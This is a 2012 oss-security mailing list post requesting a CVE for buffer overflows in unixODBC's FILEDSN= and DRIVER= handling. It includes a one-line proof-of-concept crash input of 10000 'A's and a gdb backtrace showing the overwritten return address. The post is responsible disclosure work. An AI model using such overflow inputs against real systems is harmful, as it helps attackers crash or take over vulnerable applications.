Openwall GNU/*/Linux - a small security-enhanced Linux distro for servers
[<prev] [next>] [thread-next>] [day] [month] [year] [list]
Date: Tue, 29 May 2012 09:42:42 -0300
From: Felipe Pena <felipensp@...il.com>
To: oss-security@...ts.openwall.com
Subject: CVE id request: Multiple buffer overflow in unixODBC

Hi, please assign a CVE id for the issue:

Multiple buffer overflow in unixODBC
===========================

The library unixODBC doesn't check properly the input from FILEDSN=,
DRIVER= options in the DSN,
which causes buffer overflow when passed to the SQLDriverConnect() function.

The unixODBC maintainer has been notified about the issue.

Version affected
============

FILEDSN= as of 2.0.10
DRIVER= as of 2.3.1

PoC
===

$ ./poc "FILEDSN=$(python -c "print 'A'*10000")"
Segmentation fault

(gdb) bt
 #0  0x00007ffff7bc8c81 in SQLReadFileDSN (pszFileName=<value optimized
 out>, pszAppName=<value optimized out>, pszKeyName=<value optimized
 out>,
    pszString=<value optimized out>, nString=<value optimized out>,
 pnString=<value optimized out>) at SQLReadFileDSN.c:207
 #1  0x4141414141414141 in ?? ()


CREDITS
=======

This bug was discovered by Felipe Pena.
BugSec Team - http://www.bugsec.com.br/

Powered by blists - more mailing lists

Please check out the Open Source Software Security Wiki, which is counterpart to this mailing list.

Powered by Openwall GNU/*/Linux - Powered by OpenVZ